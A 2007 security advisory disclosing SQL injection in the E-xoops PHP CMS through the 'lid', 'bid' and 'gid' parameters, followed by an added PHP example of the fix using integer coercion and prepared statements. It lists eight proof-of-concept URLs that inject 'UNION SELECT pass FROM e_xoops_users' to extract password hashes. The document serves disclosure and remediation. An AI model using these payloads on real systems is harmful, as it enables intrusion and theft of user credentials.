############################################
E-xoops multiple variable/scripts SQL injection
vendor url: http://www.e-xoops.com
Advisory: http://lostmon.blogspot.com/2007/12/e-xoops-multiple-variablescripts-sql.html
vendor notify: NO
exploits available: YES
############################################

E-xoops is a content/community management system written in PHP and MySQL.

E-xoops contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the scripts not properly sanitizing user-supplied input to the 'lid', 'bid' and 'gid' variables in multiple scripts. This may allow an attacker to inject or manipulate SQL queries in the backend database.

#################
Versions:
#################

E-Xoops 1.08
E-Xoops 1.05 Rev3
E-Xoops 1.05 Rev2
E-Xoops 1.05 Rev1
and possibly earlier versions.

#################
Solution:
#################

No solution is available at this time. Try to edit the source code.

You can look at this post in my group to patch E-xoops, because the source code is very similar to the bcoos CMS:
http://groups.google.com/group/lostmon/browse_thread/thread/59f3b836fad5b009

And here you have a source reference for E-xoops 1.0.8:
http://phpxref.com/xref/exoops/nav.html

#################
Timeline:
#################

Discovered: 25-11-2007
vendor notify: --------
vendor response: -------
disclosure: 09-12-2007

#################
SQL injections:
#################

http://localhost/e-xoops/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/mydownloads/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/banners/click.php?bid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/arcade/index.php?act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

#################### End ########################

Thanks to estrella for being my light
Thanks to FalconDeOro for his support
Thanks to Imydes from http://www.imydes.com

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....
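The Solution section above only says to edit the source code. The following is an added example, not E-xoops or bcoos code, of what that edit looks like for the class of bug the advisory describes: a numeric id ('lid', 'bid' or 'gid') read from the query string and concatenated straight into a SQL statement, beside a hardened version that coerces the parameter to an integer and then binds it with a prepared statement. The table name `links`, the column `title`, the use of PDO and the in-memory SQLite database are assumptions made so the example runs offline; the `e_xoops_users` table name and the injected value are taken from the advisory's own proof-of-concept URLs.

```php
<?php
// Added example (not E-xoops source). Table/column names and the PDO/SQLite
// setup are assumptions so the hardened path can run stand-alone.

// UNSAFE pattern: the id from $_GET is interpolated verbatim into the SQL text,
// so a value such as "-1 UNION SELECT ..." becomes part of the statement.
function buildRateQueryUnsafe(string $lid): string
{
    return "SELECT title FROM links WHERE lid=" . $lid;
}

// HARDENED step 1: force the parameter to a plain integer before any use.
// intval() is the usual one-line fix in PHP code of this era; this version is
// stricter and rejects anything that is not an optional sign plus digits.
function sanitizeId($raw): int
{
    if (!is_int($raw) && !is_string($raw)) {
        return 0;
    }
    if (!preg_match('/^-?\d+$/', (string) $raw)) {
        return 0; // not a bare integer: treat as missing
    }
    return (int) $raw;
}

// HARDENED step 2: keep the value out of the SQL text entirely by binding it
// as an integer parameter of a prepared statement.
function fetchLinkTitle(PDO $db, $rawLid): ?string
{
    $lid = sanitizeId($rawLid);
    if ($lid <= 0) {
        return null; // bad or missing id: refuse instead of querying
    }
    $stmt = $db->prepare('SELECT title FROM links WHERE lid = :lid');
    $stmt->bindValue(':lid', $lid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['title'] : null;
}

// Constructed input of the kind shown in the advisory's PoC URLs (URL-decoded).
$hostile = '-1 UNION SELECT pass FROM e_xoops_users LIMIT 1';

echo buildRateQueryUnsafe($hostile), "\n"; // injected text is now part of the query
var_dump(sanitizeId($hostile));             // int(0): rejected
var_dump(sanitizeId('42'));                 // int(42)

// In-memory SQLite stand-in for MySQL (assumption) so the hardened path runs offline.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE links (lid INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO links VALUES (42, 'Example link')");

var_dump(fetchLinkTitle($db, '42'));     // string(12) "Example link"
var_dump(fetchLinkTitle($db, $hostile)); // NULL: the request never reaches the database
```

The integer coercion alone closes the injection in each of the scripts listed above, since every affected parameter is a numeric id; the prepared statement is the second layer that keeps the fix from depending on every caller remembering to cast.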